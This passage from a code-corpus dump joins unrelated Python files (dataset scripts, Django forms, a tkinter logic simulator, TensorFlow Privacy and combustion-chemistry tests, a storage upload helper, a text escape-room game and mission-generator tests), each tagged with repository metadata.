            import seaborn as sns
            sns.set()
        xs = np.arange(len(rewards))
        min_rewards = np.amin(rewards, axis=1)
        max_rewards = np.amax(rewards, axis=1)
        median_rewards = np.median(rewards, axis=1)
        # Median line plus min/max band across repetitions.
        plt.plot(xs, median_rewards, color='green', linewidth=2.0)
        plt.fill_between(xs, min_rewards, max_rewards, color='green', alpha=0.4)
        plt.xlabel('episodes')
        plt.ylabel('reward')
        plt.savefig(fname=(args.path + '.png'))
if __name__ == '__main__':
    main()
| 2.140625 | 2 |
custom tools/generate_txt.py | junhai0428/YOLOX-OBB | 36 | 12762163 | # import os
#
# # path = '/home/yangyang/yangyang/DATA/gxw/dataset/DOTA_split/train'
# # label_file_name = 'labelTxt'
#
# path = '/home/yangyang/yangyang/DATA/gxw/dataset/DOTA_demo/VOC2012'
# label_file_name = 'Annotations'
#
# label_file_path = os.path.join(path, label_file_name)
# filelist = os.listdir(label_file_path)
#
# # txt_path = os.path.join(path, 'train.txt')
# txt_path = os.path.join(path, 'train.txt')
# f = open(txt_path, 'a')
#
# for filename in filelist:
# txt = filename.split('.')[0]
# f.write('{}\n'.format(txt))
#
# f.close()
import os

# Write the stem (filename before the first '.') of every file in the test
# image directory into test.txt, one per line.
label_file_path = '/home/lyy/gxw/DOTA_OBB_1_5/VOC2012/JPEGImages-test'
filelist = os.listdir(label_file_path)
path = '/home/lyy/gxw'
txt_path = os.path.join(path, 'test.txt')
# Context manager guarantees the handle is closed even on error.  Mode 'a'
# preserves the original append semantics: re-running adds duplicate lines
# rather than rewriting the file.
with open(txt_path, 'a') as f:
    for filename in filelist:
        stem = filename.split('.')[0]
        f.write('{}\n'.format(stem))
django_private_beta/urls.py | andytwoods/Django-Private-Beta | 0 | 12762164 | <filename>django_private_beta/urls.py
from django.conf.urls import url
from . import views
app_name = 'private_beta'
urlpatterns = [
url(r'^private_beta/', views.PrivateBeta.as_view(), name='private_beta'),
]
| 1.609375 | 2 |
pywire/test_suite.py | Verkhovskaya/PyDL | 5 | 12762165 | from pywire.signal import Signal
from tkinter import *
from tkinter.ttk import Separator
from enum import Enum
class BitState(Enum):
    """State of one displayed signal bit in the simulation GUI.

    The *_FORCED states are set by the user clicking a bit's button and are
    never overwritten by Application.recalculate_states(); TRUE/FALSE are
    computed values, and UNDEFINED means the value could not be determined.
    """
    TRUE = 1
    FALSE = 2
    TRUE_FORCED = 3
    FALSE_FORCED = 4
    UNDEFINED = 5
def bitsToInt(bit_array):
    """Interpret *bit_array* (most significant bit first) as an unsigned int.

    TRUE/TRUE_FORCED count as 1, FALSE/FALSE_FORCED as 0.  Returns None if
    any bit is UNDEFINED, since the numeric value is then unknowable.
    """
    total = 0
    for bit in bit_array:
        if bit.state == BitState.UNDEFINED:
            return None
        # bool arithmetic: True adds 1, False adds 0.
        total = total * 2 + (bit.state in (BitState.TRUE, BitState.TRUE_FORCED))
    return total
class Bit:
    """One clickable bit cell in the signal grid.

    Clicking cycles the bit through user-forced states; update_gui() shows
    a two-character label for the current state (e.g. "TF" = true-forced).
    """
    def press(self):
        # Click handler: UNDEFINED -> TRUE_FORCED -> FALSE_FORCED -> UNDEFINED,
        # while computed TRUE/FALSE jump straight to TRUE_FORCED.
        print("PRESSED")
        if self.state == BitState.UNDEFINED:
            self.state = BitState.TRUE_FORCED
        elif self.state == BitState.TRUE_FORCED:
            self.state = BitState.FALSE_FORCED
        elif self.state == BitState.FALSE_FORCED:
            self.state = BitState.UNDEFINED
        elif self.state == BitState.TRUE:
            self.state = BitState.TRUE_FORCED
        elif self.state == BitState.FALSE:
            self.state = BitState.TRUE_FORCED
        else:
            raise Exception("WTF")
        self.update_gui()
    def update_gui(self):
        # Reflect self.state in the button label (two-character code).
        if self.state == BitState.UNDEFINED:
            self.entity.configure(text="UN")
        elif self.state == BitState.TRUE_FORCED:
            self.entity.configure(text="TF")
        elif self.state == BitState.FALSE_FORCED:
            self.entity.configure(text="FF")
        elif self.state == BitState.TRUE:
            self.entity.configure(text="T_")
        elif self.state == BitState.FALSE:
            self.entity.configure(text="F_")
        else:
            raise Exception("WTF: " + str(self.state))
    def __init__(self, master, row, column):
        # Create the button wired to press() and place it in the given cell;
        # every bit starts as FALSE.
        self.entity = Button(master,
                             command=self.press)
        self.entity.grid(row=row, column=column)
        self.state = BitState.FALSE
        self.update_gui()
def refresh():
    # Recompute all signal values via the Application instance stashed in
    # globals() by launch_test()/Application setup.
    # NOTE(review): a module-level variable would be cleaner than globals()["app"].
    globals()["app"].recalculate_states()
class Application(Frame):
    """Tk GUI showing every Signal's bits over self.time timesteps, with
    derived signal values recomputed from each signal's driving function."""
    def draw_signals(self, master, signals, start_row):
        # Lay out one grid row per (signal, bit), one Bit button per timestep.
        # self.bits[name][timestep][bit_index] holds the Bit widgets.
        for signal in signals:
            self.bits[signal.name] = [[None for bit_index in range(len(signal))] for t in range(self.time)]
            print("LABEL")
            Label(master, text=signal.name).grid(row=start_row, column=1)
            for bit_index in range(len(signal)):
                Label(master, text="<" + str(bit_index) + ">").grid(row=start_row, column=2)
                for time_stamp in range(self.time):
                    self.bits[signal.name][time_stamp][bit_index] = Bit(master, start_row, time_stamp + 3)
                    Separator(master, orient="horizontal").grid(row=start_row, column=time_stamp + 3, sticky=S + W + E)
                start_row += 1
            start_row += 1
        print("done")
    def createLayout(self, master):
        # Header row of timestep labels plus one section per signal group.
        Button(master, text="Refresh", command=refresh).grid(row=0, column=0)
        for x in range(self.time):
            Label(master, text="t=" + str(x)).grid(row=1, column=x+3)
        row = 2
        if self.input_signals:
            Label(master, text="inputs").grid(row=row, column=0)
            self.draw_signals(master, self.input_signals, row)
            row += sum([len(signal) for signal in self.input_signals])+3
            Label(master, text=" ").grid(row=row-1, column=0)
        if self.other_signals:
            Label(master, text="other").grid(row=row, column=0)
            self.draw_signals(master, self.other_signals, row)
            row += sum([len(signal) for signal in self.other_signals]) + 3
            Label(master, text=" ").grid(row=row-1, column=0)
        if self.output_signals:
            Label(master, text="outputs").grid(row=row, column=0)
            self.draw_signals(master, self.output_signals, row)
            row += sum([len(signal) for signal in self.output_signals]) + 3
            Label(master, text=" ").grid(row=row-1, column=0)
    def recalculate_states(self):
        # Re-evaluate every driven signal at every timestep, then repaint.
        for time_stamp in range(0, self.time):
            for signal in Signal.all_signals:
                if signal.driving_signals:
                    input_states = []
                    for input_signal in signal.driving_signals:
                        # Clocked signals read their inputs from the previous
                        # timestep.  NOTE(review): at time_stamp 0 this indexes
                        # [-1], wrapping to the LAST timestep — confirm intended.
                        if signal.clock:
                            input_bits = self.bits[input_signal.name][time_stamp-1]
                        else:
                            input_bits = self.bits[input_signal.name][time_stamp]
                        input_states.append(bitsToInt(input_bits))
                    output_val = signal.driving_function(*input_states)
                    if isinstance(output_val, int):
                        # Render as a fixed-width binary string, truncated to
                        # the signal's width (keeping the low-order bits).
                        output_string = bin(output_val)[2:].rjust(len(signal), "0")
                        output_string = output_string[len(output_string)-len(signal):]
                        print(output_string)
                        output_bool_array = [letter == "1" for letter in output_string]
                        print(output_bool_array)
                        signal_bits = self.bits[signal.name][time_stamp]
                        for index in range(len(output_bool_array)):
                            # User-forced bits are never overwritten.
                            if signal_bits[index].state == BitState.TRUE_FORCED:
                                pass
                            elif signal_bits[index].state == BitState.FALSE_FORCED:
                                pass
                            elif output_bool_array[index]:
                                signal_bits[index].state = BitState.TRUE
                            else:
                                signal_bits[index].state = BitState.FALSE
                    # NOTE(review): this branch is unreachable — bool is a
                    # subclass of int, so booleans take the branch above.  If
                    # it ever ran it would also NameError on output_bool_array
                    # / signal_bits and replace Bit objects with BitState
                    # members.  Confirm and remove or fix.
                    elif isinstance(output_val, bool):
                        for index in range(len(output_bool_array)):
                            if output_val:
                                signal_bits[index] = BitState.TRUE
                            else:
                                signal_bits[index] = BitState.FALSE
                    else:
                        raise Exception("Function output is not a boolean or int")
        # Repaint every bit button to reflect the recomputed states.
        for signal in Signal.all_signals:
            for bit_row in self.bits[signal.name]:
                for bit in bit_row:
                    bit.update_gui()
    def __init__(self, master=None):
        # Partition all registered signals by io direction and build the UI.
        self.bits = {}
        self.time = 10
        signals = Signal.all_signals
        self.input_signals = list(filter(lambda x: x.io == "in", signals))
        self.output_signals = list(filter(lambda x: x.io == "out", signals))
        self.other_signals = list(filter(lambda x: not x.io, signals))
        Frame.__init__(self, master)
        print("Creating layout")
        self.createLayout(master)
        print("DONE")
        self.recalculate_states()
def launch_test():
    """Open the simulator window; blocks in the Tk main loop until closed."""
    root = Tk()
    app = Application(master=root)
    # refresh() finds the Application instance through module globals.
    globals()["app"] = app
    app.mainloop()
    root.destroy()
"""
class TestObject:
def __init__(self, signals=Signal.all_signals, inputs={}, turns=10):
self.all_signals = signals
self.in_signals = list(filter(lambda x: x.io == "in", signals))
self.out_signals = list(filter(lambda x: x.io == "out", signals))
def print(self, turn, signals=self.signals):
""" | 2.71875 | 3 |
tensorflow_privacy/privacy/estimators/v1/dnn_test.py | amad-person/privacy | 2,327 | 12762166 | # Copyright 2020, The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for DP-enabled DNNClassifier."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from absl.testing import parameterized
import tensorflow as tf
from tensorflow_privacy.privacy.estimators import test_utils
from tensorflow_privacy.privacy.estimators.v1 import dnn
from tensorflow_privacy.privacy.optimizers.dp_optimizer import DPGradientDescentGaussianOptimizer
class DPDNNClassifierTest(tf.test.TestCase, parameterized.TestCase):
  """Tests for DP-enabled DNNClassifier."""

  @parameterized.named_parameters(
      ('BinaryClassDNN', 2),
      ('MultiClassDNN 3', 3),
      ('MultiClassDNN 4', 4),
  )
  def testDNN(self, n_classes):
    """Smoke-tests train/evaluate/predict of a DP DNNClassifier.

    Args:
      n_classes: Number of output classes for the synthetic dataset.
    """
    train_features, train_labels = test_utils.make_input_data(256, n_classes)
    # One numeric feature column per synthetic input feature.
    feature_columns = [
        tf.feature_column.numeric_column(key=key) for key in train_features
    ]

    # DP-SGD optimizer; noise_multiplier=0.0 keeps the run deterministic
    # while still exercising the per-microbatch clipping code path.
    optimizer = functools.partial(
        DPGradientDescentGaussianOptimizer,
        learning_rate=0.5,
        l2_norm_clip=1.0,
        noise_multiplier=0.0,
        num_microbatches=1)

    # Reduction must be NONE so the DP optimizer sees per-example losses.
    classifier = dnn.DNNClassifier(
        hidden_units=[10],
        activation_fn='relu',
        feature_columns=feature_columns,
        n_classes=n_classes,
        optimizer=optimizer,
        loss_reduction=tf.losses.Reduction.NONE)

    classifier.train(
        input_fn=test_utils.make_input_fn(train_features, train_labels, True,
                                          16))

    test_features, test_labels = test_utils.make_input_data(64, n_classes)
    classifier.evaluate(
        input_fn=test_utils.make_input_fn(test_features, test_labels, False,
                                          16))

    predict_features, predict_labels = test_utils.make_input_data(64, n_classes)
    classifier.predict(
        input_fn=test_utils.make_input_fn(predict_features, predict_labels,
                                          False))
# Allow running this test file directly with `python dnn_test.py`.
if __name__ == '__main__':
  tf.test.main()
| 2.0625 | 2 |
tests/griffon/test_rhsjac_isochoric_open_adiabatic.py | sandialabs/Spitfire | 11 | 12762167 | import unittest
from numpy import hstack, max, abs, sqrt
from cantera import Solution, gas_constant
import numpy as np
from spitfire import ChemicalMechanismSpec
from os.path import join, abspath
from subprocess import getoutput
# Directory holding the legacy Cantera XML mechanisms used by these tests.
test_mech_directory = abspath(join('tests', 'test_mechanisms', 'old_xmls'))
# One mechanism name per *.xml file in the directory.
# NOTE(review): shelling out to `ls | grep` is POSIX-only, and the unescaped
# '.' in the grep pattern matches any character; os.listdir/glob would be more
# robust — left unchanged here to preserve behavior.
mechs = [x.replace('.xml', '') for x in getoutput('ls ' + test_mech_directory + ' | grep .xml').split('\n')]
def rhs_cantera(p_arg, T_arg, y_arg, rhoin, Tin_arg, yin_arg, tau_arg, gas, rhs_chem_in):
    """Reference RHS for an adiabatic isochoric open reactor, built with Cantera.

    Adds the mass inflow/outflow terms for a reactor fed at density ``rhoin``,
    temperature ``Tin_arg`` and mass fractions ``yin_arg`` with residence time
    ``tau_arg`` on top of the chemistry-only RHS ``rhs_chem_in``.  The state
    ordering is assumed to be [rho, T, Y_0..Y_{ns-2}], matching the Griffon
    state vector used elsewhere in this file.
    """
    gas.TPY = T_arg, p_arg, y_arg
    rho = gas.density_mass
    cv = gas.cv_mass
    # Per-species specific internal energies at the reactor state...
    e = gas.standard_int_energies_RT * gas.T * gas_constant / gas.molecular_weights
    gas.TDY = Tin_arg, rhoin, yin_arg
    # ...and at the inflow state.
    ein = gas.standard_int_energies_RT * gas.T * gas_constant / gas.molecular_weights
    rhs = np.copy(rhs_chem_in)
    rhsMass = np.zeros(gas.n_species + 1)
    rhsMass[0] += (rhoin - rho)
    rhsMass[1] += 1. / (rho * cv) * (rhoin * np.sum(yin_arg * (ein - e)))
    # Only the first ns-1 mass fractions are part of the state vector.
    rhsMass[2:] += rhoin / rho * (yin_arg[:-1] - y_arg[:-1])
    rhs += rhsMass / tau_arg
    return rhs
def validate_on_mechanism(mech, temperature, pressure, tau, do_rhs, do_jac):
    """Compare Griffon's isochoric reactor RHS/Jacobian against references.

    With ``do_rhs`` set, the full Griffon RHS is compared to a Cantera-built
    reference; with ``do_jac`` set, the analytical Jacobian is compared to a
    central finite-difference approximation.  Returns True when the relative
    error is below the tolerance.
    """
    xml = join(test_mech_directory, mech + '.xml')
    T = temperature
    # Feed runs 1000 K hotter than the reactor.
    Tin = T + 1000.
    p = pressure

    r = ChemicalMechanismSpec(xml, 'gas').griffon
    gas = Solution(xml)
    ns = gas.n_species

    y = np.ones(ns)  # equal masses in the reactor
    gas.TPY = T, p, y
    y = np.copy(gas.Y)
    rho = gas.density_mass

    xin = np.ones(ns)  # equal moles in the feed
    gas.TPX = Tin, p, xin
    yin = np.copy(gas.Y)
    rhoin = gas.density_mass

    # Griffon state vector: [rho, T, Y_0..Y_{ns-2}].
    state = hstack((rho, T, y[:-1]))

    # Chemistry-only RHS (flow terms disabled) feeds the Cantera reference.
    rhsGRChemOnly = np.zeros(ns + 1)
    r.reactor_rhs_isochoric(state, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, False, rhsGRChemOnly)
    rhsCN = rhs_cantera(p, T, y, rhoin, Tin, yin, tau, gas, rhsGRChemOnly)

    rhsGR = np.empty(ns + 1)
    r.reactor_rhs_isochoric(state, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR)

    if do_rhs:
        return max(abs(rhsGR - rhsCN) / (abs(rhsCN) + 1.)) < 100. * sqrt(np.finfo(float).eps)

    if do_jac:
        jacGR = np.empty((ns + 1) * (ns + 1))
        r.reactor_jac_isochoric(state, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, 0, rhsGR, jacGR)
        # Griffon returns the Jacobian flattened column-major.
        jacGR = jacGR.reshape((ns + 1, ns + 1), order='F')

        # Central finite differences, column by column.
        drho = 1.e-6
        dT = 1.e-6
        dY = 1.e-6
        jacFD = np.empty((ns + 1, ns + 1))
        rhsGR1, rhsGR2 = np.empty(ns + 1), np.empty(ns + 1)

        state_m = hstack((rho - drho, T, y[:-1]))
        state_p = hstack((rho + drho, T, y[:-1]))
        r.reactor_rhs_isochoric(state_m, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR1)
        r.reactor_rhs_isochoric(state_p, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR2)
        jacFD[:, 0] = (- rhsGR1 + rhsGR2) / (2. * drho)

        state_m = hstack((rho, T - dT, y[:-1]))
        state_p = hstack((rho, T + dT, y[:-1]))
        r.reactor_rhs_isochoric(state_m, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR1)
        r.reactor_rhs_isochoric(state_p, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR2)
        jacFD[:, 1] = (- rhsGR1 + rhsGR2) / (2. * dT)

        for i in range(ns - 1):
            # Perturb species i against the last species so the mass
            # fractions keep summing to one.
            y_m1, y_p1 = np.copy(y), np.copy(y)
            y_m1[i] += - dY
            y_m1[-1] -= - dY
            y_p1[i] += dY
            y_p1[-1] -= dY
            state_m = hstack((rho, T, y_m1[:-1]))
            state_p = hstack((rho, T, y_p1[:-1]))
            r.reactor_rhs_isochoric(state_m, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR1)
            r.reactor_rhs_isochoric(state_p, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR2)
            jacFD[:, 2 + i] = (- rhsGR1 + rhsGR2) / (2. * dY)

        # Looser tolerance: finite differences limit the attainable accuracy.
        return max(abs(jacGR - jacFD) / (abs(jacGR) + 1.)) < 4.e-3
def create_test(m, T, p, tau, do_rhs, do_jac):
    """Build a unittest-style method asserting validate_on_mechanism passes
    for mechanism *m* at the given temperature, pressure and residence time."""
    def test(self):
        outcome = validate_on_mechanism(m, T, p, tau, do_rhs, do_jac)
        self.assertTrue(outcome)
    return test
class Accuracy(unittest.TestCase):
    """Empty container; test methods are attached dynamically below."""
    pass
# Residence times to exercise: a fast-flow case and a relaxed case.
tau_list = [1.e-6, 1.e-3]

# Attach one RHS test (and, except for methane, one Jacobian test) per
# mechanism/tau combination to the Accuracy case.
for mech in mechs:
    for tau in tau_list:
        rhsname = 'test_rhs_' + mech + '_' + 'tau=' + str(tau)
        jacname = 'test_jac_' + mech + '_' + 'tau=' + str(tau)
        setattr(Accuracy, rhsname, create_test(mech, 600., 101325, tau, True, False))
        if 'methane' not in mech:  # skip methane in the finite difference Jacobian tests
            setattr(Accuracy, jacname, create_test(mech, 600., 101325, tau, False, True))

if __name__ == '__main__':
    unittest.main()
| 2 | 2 |
unknowntags/forms.py | rickvanderzwet/makerspaceleiden-crm | 0 | 12762168 | from django import forms
from django.forms import ModelForm
from django.conf import settings
from members.models import User
from .models import Unknowntag
class SelectUserForm(forms.Form):
    """Pick the member that an unknown tag should be assigned to."""

    user = forms.ModelChoiceField(queryset=User.objects.all())
    activate_doors = forms.BooleanField(
        initial=True,
        help_text='Also give this user door permits if they did not have it yet.',
    )
class SelectTagForm(forms.Form):
    """Pick one of the recorded unknown tags to process."""

    tag = forms.ModelChoiceField(queryset=Unknowntag.objects.all())
    activate_doors = forms.BooleanField(
        initial=True,
        help_text='Also give this user door permits if they did not have it yet.',
    )
| 2.34375 | 2 |
language-python-test/test/features/operators/isnot.py | wbadart/language-python | 0 | 12762169 | 3 is not 4
3 is not 3
3 is not 4 is not 5
| 1.835938 | 2 |
storage_bucket/upload_file.py | thomasborgen/storage-bucket | 4 | 12762170 | from storage_bucket.bucket import get_bucket
def upload_file(
    *,
    file_content: bytes,
    storage_bucket_name: str,
    filename: str,
    content_type: str = 'application/octet-stream',
    **kwargs: dict,
) -> None:
    """
    Upload the given bytes to a google cloud storage bucket.

    .. versionadded:: 0.0.1

    :param file_content: contents to upload in bytes
    :type file_content: bytes
    :param storage_bucket_name: Name of the google cloud bucket
    :type storage_bucket_name: str
    :param filename: The name to give the uploaded file
    :type filename: str
    :param content_type: MIME type of the uploaded blob, defaults to
        application/octet-stream
    :type content_type: str
    :return: None
    """
    bucket = get_bucket(storage_bucket_name=storage_bucket_name)
    blob = bucket.blob(filename)
    # Extra keyword arguments are forwarded verbatim to
    # Blob.upload_from_string (presumably arbitrary types — the ``dict``
    # annotation on **kwargs looks wrong; TODO confirm).
    blob.upload_from_string(
        file_content,
        content_type=content_type,
        **kwargs,
    )
| 2.953125 | 3 |
TextGameDemoV2.py | CXPhoenix/python-cli-game | 0 | 12762171 | <filename>TextGameDemoV2.py
import os
import sys
import time
def clearScene():
    """Clear the terminal screen; only Windows and macOS are supported."""
    clear_commands = {'win32': 'cls', 'darwin': 'clear'}
    for prefix, command in clear_commands.items():
        if sys.platform.startswith(prefix):
            os.system(command)
            return
    raise Exception('This game just support Windows and MacOS system..')
def getChoice(options: list):
    """Show a numbered menu, return the player's raw input, clear the screen.

    Only for Windows and MacOS (relies on clearScene).
    """
    print("操作選項")
    number = 1
    for option in options:
        print(f"{number}. {option}")
        number += 1
    selection = input(': ')
    clearScene()
    return selection
def getNewScene(nowScene: str, choice: str, options: list, move: dict):
    """Map the player's 1-based menu choice to the next scene name.

    Returns the scene that *move* maps the chosen option to, or *nowScene*
    unchanged (after showing an error message) when the input is not a
    valid option number.
    """
    try:
        index = int(choice) - 1
        if index < 0:
            # BUG FIX: a negative index silently wrapped around (e.g. the
            # input "0" selected the LAST option); reject it instead.
            raise IndexError(choice)
        scene = move.get(options[index])
        return scene
    except (ValueError, IndexError):
        showWrongOption()
        return nowScene
def showDesc(description: str, timeSet: float = 0.05):
    """Print *description* with a typewriter effect (redraw per character).

    ``timeSet`` was the per-character delay, but the ``time.sleep`` call is
    commented out, so ``timer`` is currently computed and never used and the
    text appears almost instantly.  Passing ``timeSet=0`` prints the whole
    text at once without redrawing.
    """
    show = ""
    timer = int(timeSet*1000)
    if timer != 0:
        # Clamp the delay to at least 1 ms (dead code while sleep is disabled).
        timer = 0.001 if timeSet < 0.001 else timeSet
        for string in description:
            clearScene()
            show += string
            print(show)
            # time.sleep(timer)
    else:
        print(description)
#def showDesc(description: str):
# for string in description:
# ended = '' if description.index(string) != len(description)-1 else "\n"
# print(string, end='')
# time.sleep(0.1)
def showWrongOption():
    """Tell the player their menu input was invalid, wait for Enter, clear."""
    print('Not a smart option..')
    input(':enter')
    clearScene()
# start
# Initialize the screen first so we can ask for the player's name.
clearScene()
print('歡迎來到文字遊戲世界')
name = input('請輸入你的名字: ')
# Short "loading" animation (the per-frame sleep is currently disabled).
for i in range(3):
    clearScene()
    print(f"Hello,{name}\n遊戲即將開始{'.'*(i+1)}!")
    # time.sleep(1)
clearScene()
# set scene
# Opening narration, shown one line at a time before the game loop starts.
startScene = ["你醒來在一個房間中,房間非常狹小,除了一張桌子、一個通往外面的門外,沒有其他東西。",
              "桌子上面留有一封信給你",
              "門旁邊有數字按鈕鎖",
              "似乎你在一個...密室逃脫?"]
# Scene graph: each entry has a 'description' to show, the menu 'options',
# and a 'move' map from chosen option text to the next scene key.
scene = {
    # scenes while facing forward (the desk)
    'forward': {
        'description': "一張桌子,上面放著一張紙條,似乎還有一個抽屜",
        'options': "查看信 查看抽屜 向左轉 向右轉".split(),
        'move': {
            '查看信': 'mail',
            '查看抽屜': 'drawer',
            '向左轉': 'lefthand',
            '向右轉': 'righthand',
        },
    },
    'mail': {
        'description':
        f"""你好 {name},
歡迎來到文字型密室脫逃遊戲中。
似乎你已經被困在這個狹小的房間中,
巴不得趕快離開吧?
其實呢,要離開這裡非常簡單,
就是破解密碼而已,
一旦破解成功,
就直接逃出去了。
祝福你 逃出升天!
Best regards,
把你抓進來的人""",
        'options': "把信放回桌上".split(),
        'move': {
            "把信放回桌上": "forward"
        },
    },
    'drawer': {
        'description': "打開抽屜後,空無一物,空氣中瀰漫著嘲笑你的聲音",
        'options': "平靜地關閉抽屜 憤怒地關上抽屜".split(),
        'move': {
            '平靜地關閉抽屜': 'forward',
            '憤怒地關上抽屜': 'forward',
        },
    },
    # Hidden scene: the poem hinting at the door code; unlocked by the
    # drawer choice sequence handled in the main loop below.
    'tableText': {
        'description': "信風吹盡日,\n山中人歸心。\n壺中有高樓,\n飄蓬萊密林,\n千年未央碼。",
        'options': "查看完畢".split(),
        'move': {
            '查看完畢': 'forward',
        },
    },
    # scene while facing left
    'lefthand': {
        'description': '就只是一面牆',
        'options': "向左轉 向右轉".split(),
        'move': {
            '向左轉': 'backward',
            '向右轉': 'forward',
        },
    },
    # scene while facing right
    'righthand': {
        'description': '就只是一面牆',
        'options': "向左轉 向右轉".split(),
        'move': {
            '向左轉': 'forward',
            '向右轉': 'backward',
        },
    },
    # scenes while facing backward (the door)
    'backward': {
        'description': '有一到門,門旁邊有一個密碼鎖',
        'options': "使用密碼鎖 向左轉 向右轉".split(),
        'move': {
            '使用密碼鎖': 'lock',
            '向左轉': 'righthand',
            '向右轉': 'lefthand',
        },
    },
    'lock': {
        'description': '看起來是要輸入六位數字的密碼',
        'options': '輸入密碼 向後退'.split(),
        'move': {
            '輸入密碼': 'lockInput',
            '向後退': 'backward',
        },
    },
    # Password entry is handled specially in the main loop (no 'move' map).
    'lockInput': {
        'description': '輸入六位數字的密碼',
    },
}
# Epilogue lines shown after the player escapes.
endScene = [
    "你成功的脫逃出這個奇怪的密室逃脫...",
    "但是你有一種預感",
    "這一切都還沒結束",
    "......",
    "阿,還有資科課要過啦..."
]
# game start: play the opening narration
for s in startScene:
    showDesc(s)
    input('\n:enter')
    clearScene()
# nowScene is the current key into the ``scene`` dict
nowScene = 'forward'
# game loop: runs until the player enters the correct door code
while nowScene != 'GetOut':
    # Already-seen scenes (and the letter) are printed instantly;
    # first visits use the typewriter effect and get marked as read.
    if scene.get(nowScene).get('readed') or nowScene == 'mail':
        showDesc(scene.get(nowScene).get('description'), 0)
    else:
        showDesc(scene.get(nowScene).get('description'))
        scene.get(nowScene)['readed'] = True
    if nowScene == 'lockInput':
        lockpw = input(': ')
    else:
        print()
        choice = getChoice(scene.get(nowScene).get('options'))
    # scene-specific handling
    # lockInput scene: validate the six-digit code
    if nowScene == 'lockInput':
        if len(lockpw) != 6:
            clearScene()
            print('Not good passwords..')
            input(':enter')
            nowScene = 'lock'
        elif lockpw == '487919':
            nowScene = 'GetOut'
        else:
            clearScene()
            print('wrong passwords..')
            input(':enter')
            nowScene = 'lock'
        clearScene()
    # drawer scene: record the choice history; closing it calmly ('1') and
    # then angrily ('2') reveals the hidden text on the desk
    elif nowScene == 'drawer':
        nowScene = getNewScene(nowScene, choice, scene.get(nowScene).get("options"), scene.get(nowScene).get("move"))
        scene.get('drawer')['hiddenCondition'] = scene.get('drawer').get('hiddenCondition') + choice + ' ' if scene.get('drawer').get('hiddenCondition') else choice + ' '
        if scene.get('drawer').get('hiddenCondition'):
            hiddenCondition = scene.get('drawer').get('hiddenCondition').split()
            if len(hiddenCondition) >= 2:
                if hiddenCondition[-2:len(hiddenCondition)] == ['1', '2']:
                    scene.get('forward')['description'] = "一張桌子,上面放著一張紙條,似乎還有一個抽屜\n桌子上好像有一段模糊的文字顯示出來..."
                    scene.get('forward')['options'] = "查看信 查看抽屜 向左轉 向右轉 查看桌上顯示的字".split()
                    scene.get('forward')['move']['查看桌上顯示的字'] = 'tableText'
    else:
        nowScene = getNewScene(nowScene, choice, scene.get(nowScene).get("options"), scene.get(nowScene).get("move"))
# end scene: play the epilogue
for s in endScene:
    showDesc(s)
    input('\n:enter')
    clearScene()
showDesc('The end..')
input(':enter for end..')
test/test_base_mission_generation.py | eriksalt/blades_helper_proj | 0 | 12762172 | import pytest
import test.mock_data_gateway
from blades_helper.mission_generator import _get_next_mission_type, _can_use_mission_type, _generate_base_missions
from blades_helper.mission_generator_constants import MissionGeneratorConstants as con
def setup_one_mission_base_build(mock, note, type):
    """Register a single mission (count 1, with the given note and type)
    on the mock data gateway."""
    mock.mission_types.append(type)
    mock.mission_counts.append((1, note))
def check_array(source, target):
    """Assert two sequences have equal length and equal elements pairwise."""
    assert len(source) == len(target)
    # zip over an index loop: same comparisons, clearer intent.
    for left, right in zip(source, target):
        assert left == right
def check_mission_type(mission, mission_type):
    """Assert the mission carries the expected mission type."""
    assert mission_type == mission.mission_type
def check_note_len(mission, notes_len):
    """Assert the mission carries exactly *notes_len* notes."""
    assert notes_len == len(mission.notes)
def check_for_note(mission, note_to_find):
    """Assert at least one mission note contains *note_to_find* as a substring.

    Replaces the original loop that fell through to a bare ``assert False``;
    ``any`` states the intent directly and gives a meaningful failing
    expression in the pytest report.
    """
    assert any(note_to_find in note for note in mission.notes)
def check_requirement(mission, specialist):
    """Assert *specialist* is listed in the mission's requirements.

    BUG FIX: this helper used to *return* the membership result, but every
    caller discards the return value, so the check could never fail.  Like
    its sibling check_* helpers, it now asserts.
    """
    assert specialist in mission.requirements
def check_for_note_plus_one_specialist(mission, specialist):
    """Assert the mission both requires *specialist* and advertises the
    extra-specialist note."""
    check_requirement(mission, specialist)
    check_for_note(mission, "Mission can include one additional specialist")
def check_for_note_favor(mission, favor_type):
    """Assert the mission carries the favor note together with *favor_type*."""
    check_for_note(mission, favor_type)
    check_for_note(mission, con.FAVOR_NOTE[:-3])
def check_mission(mission, mission_type, target, rewards, penalties, notes_len, requirement, contained_notes):
    """Run the standard battery of assertions against one generated mission."""
    check_mission_type(mission, mission_type)
    assert target == mission.target
    check_array(mission.rewards, rewards)
    check_array(mission.penalties, penalties)
    check_note_len(mission, notes_len)
    if requirement != con.NOTHING:
        check_requirement(mission, requirement)
    for expected_note in contained_notes:
        check_for_note(mission, expected_note)
def test_get_next_mission_type():
    """The mission-type rotation is fixed; terminal/GM types are rejected."""
    assert _get_next_mission_type(con.ASSAULT) == con.RECON
    assert _get_next_mission_type(con.RECON) == con.RELIGIOUS
    assert _get_next_mission_type(con.RELIGIOUS)==con.SUPPLY
    assert _get_next_mission_type(con.SUPPLY) == con.COMMANDER_FOCUS
    with pytest.raises(AssertionError):
        _get_next_mission_type(con.COMMANDER_FOCUS)
    with pytest.raises(AssertionError):
        _get_next_mission_type(con.GM_CHOICE)

def test_can_use_mission_type():
    """A type is usable when it is in the available list; SPECIAL and
    GM_CHOICE follow the same membership rule."""
